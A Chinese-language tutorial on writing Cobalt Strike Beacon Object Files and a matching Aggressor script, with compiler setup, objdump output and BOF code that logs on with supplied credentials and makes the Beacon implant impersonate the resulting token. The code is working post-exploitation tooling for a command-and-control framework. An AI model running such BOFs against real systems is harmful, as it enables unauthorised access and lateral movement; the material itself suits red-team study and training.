CobaltStrike-BOF

状态: 进行中

【TOC】手牵手学习如何编写CobaltStrike-BOF及对应的cna脚本

环境

linux

MinGW-w64

通过包管理器安装MinGW-w64

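# Install the MinGW-w64 cross toolchain; the mingw-w64 metapackage pulls in
# both i686-w64-mingw32-gcc (x86) and x86_64-w64-mingw32-gcc (x64).
# (The original glob *-w64-x86-* is expanded by the shell against the current
# directory, not by apt, so it does not reliably name the package.)
sudo apt-get install -y mingw-w64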

wget https://www.cobaltstrike.com/downloads/beacon.h

普通 C 程序写法（仅作示意，并非完整可运行的程序）

#include <windows.h>
/*
 * Plain (non-BOF) reference program: perform an interactive logon with
 * LogonUserA and immediately release the resulting token. Nothing is done
 * with the token; the program only shows the API call the BOF below wraps.
 *
 * Returns 0 regardless of whether the logon succeeded.
 *
 * Caveat: the credentials are string literals and therefore end up as
 * plaintext in the compiled binary (the BOF build later on this page shows
 * them verbatim in .rdata). Lab use only.
 */
INT main() {
	HANDLE token;
	BOOL ok = LogonUserA("admin", "localhost", "1qaz!QAZ",
	                     LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT,
	                     &token);
	if (!ok) {
		return 0;
	}
	/* The token handle is owned by us and must be closed. */
	CloseHandle(token);
	return 0;
}

修改为Beacon Object File识别的格式

在 MinGW 头文件目录中搜索该函数的原型声明

┌──(kali㉿kali)-[/usr/share/mingw-w64/include]
└─$ cd /usr/share/mingw-w64/include    
                                                                                                                               
┌──(kali㉿kali)-[/usr/share/mingw-w64/include]
└─$ grep -r " LogonUserA" .        
./winbase.h:  WINADVAPI WINBOOL WINAPI LogonUserA (LPCSTR lpszUsername, LPCSTR lpszDomain, LPCSTR lpszPassword, DWORD dwLogonType, DWORD dwLogonProvider, PHANDLE phToken);

在找到的函数声明前加上该函数所属导入库的前缀（如 ADVAPI32$、KERNEL32$）。BOF 加载器正是依据这个 LIB$Func 符号名来解析导入（见下文 objdump -r 输出中的 __imp_ADVAPI32$LogonUserA 重定位项）。函数属于哪个 DLL 可在 MSDN 对应页面底部的 Requirements（DLL 一栏）中查到。

/* Dynamic Function Resolution declarations. The LIB$Func prefix tells the
 * BOF loader which DLL each import comes from; the compiler emits them as
 * __imp_LIB$Func relocations (see the objdump -r output below). */
WINADVAPI WINBOOL WINAPI ADVAPI32$LogonUserA(
	LPCSTR  lpszUsername,
	LPCSTR  lpszDomain,
	LPCSTR  lpszPassword,
	DWORD   dwLogonType,
	DWORD   dwLogonProvider,
	PHANDLE phToken);
WINBASEAPI DWORD   WINAPI KERNEL32$GetLastError(VOID);
WINBASEAPI WINBOOL WINAPI KERNEL32$CloseHandle(HANDLE hObject);
#include <windows.h>
#include "beacon.h"
/* Dynamic Function Resolution declarations: LIB$Func names are resolved by
 * the BOF loader from the named DLL at load time (they appear as
 * __imp_LIB$Func relocations in the object file). */
WINADVAPI WINBOOL WINAPI ADVAPI32$LogonUserA(
	LPCSTR  lpszUsername,
	LPCSTR  lpszDomain,
	LPCSTR  lpszPassword,
	DWORD   dwLogonType,
	DWORD   dwLogonProvider,
	PHANDLE phToken);
WINBASEAPI DWORD   WINAPI KERNEL32$GetLastError(VOID);
WINBASEAPI WINBOOL WINAPI KERNEL32$CloseHandle(HANDLE hObject);

/*
 * BOF entry point: attempt an interactive logon with compiled-in
 * credentials and report the outcome to the operator.
 *
 * args/alen: packed argument buffer from the CNA script; unused here
 *            because the credentials are hard-coded.
 *
 * Output: CALLBACK_OUTPUT "LogonSuccess!" on success; otherwise
 *         CALLBACK_ERROR carrying the Win32 error code from GetLastError().
 *
 * Caveat: the string literals are stored as plaintext in the object file's
 * .rdata section (visible in the objdump -s dump on this page), so anyone
 * holding the .o can read the credentials. The token is opened and closed
 * without being used.
 */
void go(char * args, int alen) {
	HANDLE token;
	(void)args;
	(void)alen;

	if (!ADVAPI32$LogonUserA("admin", "localhost", "1qaz!QAZ",
	                          LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT,
	                          &token)) {
		/* Report the failure code before any other API call can clobber it. */
		BeaconPrintf(CALLBACK_ERROR, "Error:%d", KERNEL32$GetLastError());
		return;
	}

	BeaconPrintf(CALLBACK_OUTPUT, "LogonSuccess!");
	KERNEL32$CloseHandle(token);
}
┌──(kali㉿kali)-[~/Bof]
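└─$ x86_64-w64-mingw32-gcc -c bofdemo.c -o bofdemo.x64.o     # 64-bit build
i686-w64-mingw32-gcc -c bofdemo.c -o bofdemo.x86.o            # 32-bit build: use the i686 cross-compiler; Debian/Kali's x86_64-w64-mingw32-gcc has no -m32 multilib, so the original "-m32" form fails (its prompt showed exit status 1)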
                                                                                                                               
┌──(kali㉿kali)-[~/Bof]
└─$ x86_64-w64-mingw32-objdump -s bofdemo.x64.o         

bofdemo.x64.o:     file format pe-x86-64

Contents of section .text:
 0000 554889e5 4883ec40 48894d10 89551848  UH..H..@H.M..U.H
 0010 8d45f848 89442428 c7442420 00000000  .E.H.D$(.D$ ....
 0020 41b90200 00004c8d 05000000 00488d15  A.....L......H..
 0030 09000000 488d0d13 00000048 8b050000  ....H......H....
 0040 0000ffd0 85c07427 488d1519 000000b9  ......t'H.......
 0050 00000000 488b0500 000000ff d0488b45  ....H........H.E
 0060 f84889c1 488b0500 000000ff d0eb2148  .H..H.........!H
 0070 8b050000 0000ffd0 4189c048 8d152700  ........A..H..'.
 0080 0000b90d 00000048 8b050000 0000ffd0  .......H........
 0090 904883c4 405dc390 90909090 90909090  .H..@]..........
Contents of section .rdata:
 0000 3171617a 2151415a 006c6f63 616c686f  1qaz!QAZ.localho
 0010 73740061 646d696e 004c6f67 6f6e5375  st.admin.LogonSu
 0020 63636573 73210045 72726f72 3a256400  ccess!.Error:%d.
Contents of section .xdata:
 0000 01080305 08720403 01500000           .....r...P..    
Contents of section .pdata:
 0000 00000000 97000000 00000000           ............    
Contents of section .rdata$zzz:
 0000 4743433a 2028474e 55292031 302d7769  GCC: (GNU) 10-wi
 0010 6e333220 32303231 30313130 00000000  n32 20210110....

┌──(kali㉿kali)-[~/Bof]
└─$ x86_64-w64-mingw32-objdump -r bofdemo.x64.o

bofdemo.x64.o:     file format pe-x86-64

RELOCATION RECORDS FOR [.text]:
OFFSET           TYPE              VALUE 
0000000000000029 R_X86_64_PC32     .rdata
0000000000000030 R_X86_64_PC32     .rdata
0000000000000037 R_X86_64_PC32     .rdata
000000000000003e R_X86_64_PC32     __imp_ADVAPI32$LogonUserA
000000000000004b R_X86_64_PC32     .rdata
0000000000000057 R_X86_64_PC32     __imp_BeaconPrintf
0000000000000067 R_X86_64_PC32     __imp_KERNEL32$CloseHandle
0000000000000072 R_X86_64_PC32     __imp_KERNEL32$GetLastError
000000000000007e R_X86_64_PC32     .rdata
000000000000008a R_X86_64_PC32     __imp_BeaconPrintf

RELOCATION RECORDS FOR [.pdata]:
OFFSET           TYPE              VALUE 
0000000000000000 rva32             .text
0000000000000004 rva32             .text
0000000000000008 rva32             .xdata
inline-execute /home/kali/Bof/bofdemo.x64.o

账号或密码错误时，BOF 通过 CALLBACK_ERROR 打印 GetLastError() 返回的错误码（含义可在 Win32 System Error Codes 列表中查询）。另请注意：上面 objdump -s 输出的 .rdata 段中可以直接看到明文的用户名和密码——硬编码凭据会随 .o 文件一起泄露，仅适合实验环境。


Internal APIs

BeaconUseToken

BeaconUseToken 让 Beacon 在后续任务中以该令牌对应用户的身份执行（模拟该登录会话，效果类似内置的 make_token）。据 MSDN，现代 Windows 上调用 LogonUserA 并不要求调用方拥有 SYSTEM 权限；若在低权限会话中失败，请先根据打印的错误码定位原因。

#include <windows.h>
#include "beacon.h"
/* Dynamic Function Resolution declarations (LIB$Func form) for the Win32
 * APIs used below; the BOF loader resolves them from the named DLLs. */
WINADVAPI WINBOOL WINAPI ADVAPI32$LogonUserA(
	LPCSTR  lpszUsername,
	LPCSTR  lpszDomain,
	LPCSTR  lpszPassword,
	DWORD   dwLogonType,
	DWORD   dwLogonProvider,
	PHANDLE phToken);
WINBASEAPI DWORD   WINAPI KERNEL32$GetLastError(VOID);
WINBASEAPI WINBOOL WINAPI KERNEL32$CloseHandle(HANDLE hObject);

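/*
 * BOF entry point: log on with compiled-in credentials and make Beacon
 * impersonate the resulting token.
 *
 * args/alen: packed argument buffer from the CNA script; unused here.
 *
 * Output: CALLBACK_OUTPUT "LogonSuccess!UseTheHandle." when the logon and
 *         the impersonation both succeed; CALLBACK_ERROR with the Win32
 *         error code if the logon fails, or a message if BeaconUseToken
 *         returns FALSE (the original ignored that return value, so a
 *         failed impersonation was reported as success).
 *
 * The impersonation persists across Beacon tasks until rev2self
 * (BeaconRevertToken). Credentials are plaintext in .rdata - lab use only.
 */
void go(char * args, int alen) {
	HANDLE LogonHandle = NULL;
	(void)args;
	(void)alen;

	if (!ADVAPI32$LogonUserA("admin1", "localhost", "1qaz!QAZ",
	                          LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT,
	                          &LogonHandle)) {
		BeaconPrintf(CALLBACK_ERROR, "Error:%d", KERNEL32$GetLastError());
		return;
	}

	/* BeaconUseToken returns BOOL; only claim success when it actually applied. */
	if (BeaconUseToken(LogonHandle)) {
		BeaconPrintf(CALLBACK_OUTPUT, "LogonSuccess!UseTheHandle.");
	} else {
		BeaconPrintf(CALLBACK_ERROR, "LogonSuccess, but BeaconUseToken failed");
	}

	/* NOTE(review): confirm against the BOF docs for your CS version whether
	 * Beacon takes ownership of the handle passed to BeaconUseToken; if it
	 * does, this CloseHandle should be dropped. Kept to match the original. */
	KERNEL32$CloseHandle(LogonHandle);
}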


执行 rev2self（对应 BOF API 中的 BeaconRevertToken()）可撤销上述模拟，恢复为 Beacon 的初始令牌。


CNA与BOF一起使用

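# $1 = beacon ID
# $2 = DOMAIN\user
# $3 = password
#
# Usage: bofdemo DOMAIN\user password
# Reads the BOF object matching the beacon's architecture, packs
# (domain, user, password) as three strings and runs its go() entry point.
#
# Fixes vs. the original: 'lcoal' typo and the stray space in '$ data';
# bof_pack was called BEFORE $domain/$user/$pass were assigned, so the BOF
# received empty strings; the x64 object was always used regardless of the
# beacon's architecture.
alias bofdemo {
	local('$handle $data $args $barch $domain $user $pass');

	# check arguments first - nothing below is meaningful without them
	if (size(@_) != 3) {
		berror($1, "bofdemo:args error");
		return;
	}

	# parse DOMAIN\user into its two parts
	($domain, $user) = split('\\\\', $2);
	$pass = $3;

	# pick the object file built for this beacon's architecture (x86 or x64)
	$barch  = barch($1);
	$handle = openf(script_resource("bofdemo. $+ $barch $+ .o"));
	$data   = readb($handle, -1);
	closef($handle);

	# pack the arguments AFTER parsing; "zzz" = three NUL-terminated strings
	# in the order go() extracts them: domain, user, password
	$args = bof_pack($1, "zzz", $domain, $user, $pass);

	# announce to user
	btask($1, "create token as $2");

	# run the BOF
	beacon_inline_execute($1, $data, "go", $args);
}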
#include <windows.h>
#include "beacon.h"
/* Dynamic Function Resolution declarations (LIB$Func form); the BOF loader
 * binds each one to the export of the named DLL at load time. */
WINADVAPI WINBOOL WINAPI ADVAPI32$LogonUserA(
	LPCSTR  lpszUsername,
	LPCSTR  lpszDomain,
	LPCSTR  lpszPassword,
	DWORD   dwLogonType,
	DWORD   dwLogonProvider,
	PHANDLE phToken);
WINBASEAPI DWORD   WINAPI KERNEL32$GetLastError(VOID);
WINBASEAPI WINBOOL WINAPI KERNEL32$CloseHandle(HANDLE hObject);

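/*
 * BOF entry point: log on with operator-supplied credentials and make
 * Beacon impersonate the resulting token.
 *
 * args/alen: buffer produced by bof_pack($1, "zzz", $domain, $user, $pass)
 *            in the CNA script - three length-prefixed strings in that order.
 *
 * Output: CALLBACK_OUTPUT "LogonSuccess!" on a successful logon; CALLBACK_ERROR
 *         with the Win32 error code if LogonUserA fails, a usage message if
 *         the argument buffer is short, or a message if BeaconUseToken
 *         returns FALSE (the original ignored that return value).
 *
 * The password crosses the C2 channel and sits in Beacon's memory in
 * plaintext while this runs; the impersonation persists until rev2self.
 */
void go(char * args, int alen) {
	HANDLE LogonHandle = NULL;
	datap parser;
	char * domain;
	char * user;
	char * pass;

	BeaconDataParse(&parser, args, alen);
	domain = BeaconDataExtract(&parser, NULL);
	user   = BeaconDataExtract(&parser, NULL);
	pass   = BeaconDataExtract(&parser, NULL);

	/* A NULL here means the buffer was short or malformed (e.g. the CNA
	 * packed fewer than three strings); refuse rather than pass NULL to
	 * LogonUserA. */
	if (domain == NULL || user == NULL || pass == NULL) {
		BeaconPrintf(CALLBACK_ERROR, "Error: expected 3 arguments (domain, user, password)");
		return;
	}

	if (!ADVAPI32$LogonUserA(user, domain, pass,
	                          LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT,
	                          &LogonHandle)) {
		BeaconPrintf(CALLBACK_ERROR, "Error:%d", KERNEL32$GetLastError());
		return;
	}

	BeaconPrintf(CALLBACK_OUTPUT, "LogonSuccess!");

	/* BeaconUseToken returns BOOL; surface a failed impersonation. */
	if (!BeaconUseToken(LogonHandle)) {
		BeaconPrintf(CALLBACK_ERROR, "BeaconUseToken failed");
	}

	/* NOTE(review): confirm against the BOF docs for your CS version whether
	 * Beacon takes ownership of the handle passed to BeaconUseToken; if it
	 * does, this CloseHandle should be dropped. Kept to match the original. */
	KERNEL32$CloseHandle(LogonHandle);
}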

